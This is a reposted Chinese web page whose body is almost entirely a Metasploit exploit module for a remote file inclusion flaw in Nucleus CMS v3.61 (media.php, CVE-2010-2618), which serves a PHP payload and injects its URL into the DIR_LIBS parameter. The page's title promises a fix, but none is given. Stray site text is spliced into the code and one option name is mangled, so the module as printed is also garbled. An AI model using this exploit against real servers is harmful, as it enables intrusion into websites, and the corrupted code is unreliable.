Nucleus v3.61远程文件包含缺陷及修复 - 网站安全

标题: Nucleus v3.61 Remote File Include (MSF) 作者: Caddy-Dz HdhCmsTest2cto测试数据下载地址: http://sourceforge.net/projects/nucleuscms/ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::PHPInclude def initialize(info = {}) super(update_info(info, 'Name' => 'Nucleus v3.61 Remote File Include Exploit', 'Description' => %q{ This module can be used to exploit Remote File Inclusion in Nucleus v3.61 in media.php }, 'Author' => [ 'Caddy-Dz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision:$', 'References' => [ [ 'CVE', '2010-2618' ], [ 'BID', '41116' ], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'ConnectionType' => 'find', }, 'Space' => 262144, # 256k }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Sep 13 2011', 'DefaultTarget' => 0)) register_options([ OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/nucleus/media.php?DIR_LIBS=!URL!']), ], self.class) end def php_exploit timeout = 0.01 HdhCmsTest2cto测试数据 uri = datastore[' PHP URI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%")) print_status("Trying uri #{uri}") response = send_request_raw( { 'global' => true, 'uri' => uri, },timeout) if response and response.code != 200 print_error("Server returned non-200 status code (#{response.code})") end handler end end

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did11384

更新时间：2022-09-13 阅读：47次